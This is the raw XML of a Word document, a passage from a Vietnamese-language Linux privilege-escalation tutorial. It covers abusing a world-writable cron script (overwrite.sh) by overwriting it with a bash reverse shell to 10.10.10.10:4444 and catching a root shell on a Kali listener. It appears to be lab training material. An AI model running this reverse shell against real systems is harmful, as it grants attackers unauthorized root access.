      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>việc</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kỳ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lịch</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</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mỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phút.</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6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cái</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overwrite.sh,</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cái</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kia</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7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</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local</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bin</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ compress.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44B3D9" w14:textId="6B4A5A9B" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="85" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xác định vị trí đường dẫn đầy đủ của tệp overwrite.sh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82EC5D" w14:textId="210E90B8" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="85" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>locate overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B44813" w14:textId="7E935475" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="121" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lưu ý rằng tệp có thể ghi trên toàn thế giới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C03B6" w14:textId="1CA191C0" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="121" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ls -l /usr/local/bin/overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193DDC3E" w14:textId="5E967899" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="164" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7536FA1B" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="108" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thay thế nội dung của tệp overwrite.sh bằng nội dung sau sau khi thay đổi địa chỉ IP thành địa chỉ của hộp Kali của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925D7DE" w14:textId="096D2ADD" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="6"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698176" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BEDA526" wp14:editId="34BBA0D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5727700" cy="367030"/>
                <wp:effectExtent l="0" t="1270" r="6350" b="3175"/>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67030"/>
                          <a:chOff x="1440" y="183"/>
                          <a:chExt cx="9020" cy="578"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="237" name="Freeform 181"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="183"/>
                            <a:ext cx="9020" cy="578"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10433 1440"/>
                              <a:gd name="T1" fmla="*/ T0 w 9020"/>
                              <a:gd name="T2" fmla="+- 0 760 183"/>
                              <a:gd name="T3" fmla="*/ 760 h 578"/>
                              <a:gd name="T4" fmla="+- 0 1467 1440"/>
                              <a:gd name="T5" fmla="*/ T4 w 9020"/>
                              <a:gd name="T6" fmla="+- 0 760 183"/>
                              <a:gd name="T7" fmla="*/ 760 h 578"/>
                              <a:gd name="T8" fmla="+- 0 1463 1440"/>
                              <a:gd name="T9" fmla="*/ T8 w 9020"/>
                              <a:gd name="T10" fmla="+- 0 760 183"/>
                              <a:gd name="T11" fmla="*/ 760 h 578"/>
                              <a:gd name="T12" fmla="+- 0 1440 1440"/>
                              <a:gd name="T13" fmla="*/ T12 w 9020"/>
                              <a:gd name="T14" fmla="+- 0 734 183"/>
                              <a:gd name="T15" fmla="*/ 734 h 578"/>
                              <a:gd name="T16" fmla="+- 0 1440 1440"/>
                              <a:gd name="T17" fmla="*/ T16 w 9020"/>
                              <a:gd name="T18" fmla="+- 0 210 183"/>
                              <a:gd name="T19" fmla="*/ 210 h 578"/>
                              <a:gd name="T20" fmla="+- 0 1467 1440"/>
                              <a:gd name="T21" fmla="*/ T20 w 9020"/>
                              <a:gd name="T22" fmla="+- 0 183 183"/>
                              <a:gd name="T23" fmla="*/ 183 h 578"/>
                              <a:gd name="T24" fmla="+- 0 10433 1440"/>
                              <a:gd name="T25" fmla="*/ T24 w 9020"/>
                              <a:gd name="T26" fmla="+- 0 183 183"/>
                              <a:gd name="T27" fmla="*/ 183 h 578"/>
                              <a:gd name="T28" fmla="+- 0 10460 1440"/>
                              <a:gd name="T29" fmla="*/ T28 w 9020"/>
                              <a:gd name="T30" fmla="+- 0 210 183"/>
                              <a:gd name="T31" fmla="*/ 210 h 578"/>
                              <a:gd name="T32" fmla="+- 0 10460 1440"/>
                              <a:gd name="T33" fmla="*/ T32 w 9020"/>
                              <a:gd name="T34" fmla="+- 0 734 183"/>
                              <a:gd name="T35" fmla="*/ 734 h 578"/>
                              <a:gd name="T36" fmla="+- 0 10437 1440"/>
                              <a:gd name="T37" fmla="*/ T36 w 9020"/>
                              <a:gd name="T38" fmla="+- 0 760 183"/>
                              <a:gd name="T39" fmla="*/ 76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0" h="578">
                                <a:moveTo>
                                  <a:pt x="8993" y="577"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="577"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23" y="577"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8993" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9020" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9020" y="551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8997" y="577"/>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82"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="183"/>
                            <a:ext cx="902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AFF9" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="12"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                            <w:p w14:paraId="6D33A026" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00665E18" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="90"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="19"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00665E18">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="19"/>
                                </w:rPr>
                                <w:t>#!/bin/bashbash -i &gt;&amp;dev/tcp/10.10.10.10/4444 0&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A526" id="Group 236" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:9.15pt;width:451pt;height:28.9pt;z-index:-251618304;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1440,183" coordsize="90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">
                <v:shape id="Freeform 181" o:spid="_x0000_s1027" style="position:absolute;left:1440;top:183;width:9020;height:578;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="90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" path="m8993,577l27,577r-4,l,551,,27,27,,8993,r27,27l9020,551r-23,26l8993,577xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8993,760;27,760;23,760;0,734;0,210;27,183;8993,183;9020,210;9020,734;8997,760" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect"/>
                </v:shapetype>
                <v:shape id="Text Box 182" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:1440;top:183;width:902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A68AFF9" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="12"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="6D33A026" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00665E18" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="90"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="19"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00665E18">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="19"/>
                          </w:rPr>
                          <w:t>#!/bin/bashbash -i &gt;&amp;dev/tcp/10.10.10.10/4444 0&gt;&amp;1</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AAA2ED" w14:textId="206C272D" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="140" w:after="60" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="164"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thiết</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lập</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istener</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8"/>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hộp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bạn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>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cổng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4444</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đợi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>việc</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>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hạy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>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mất</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhiều</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thời gian</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hơn</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phút).</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root</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
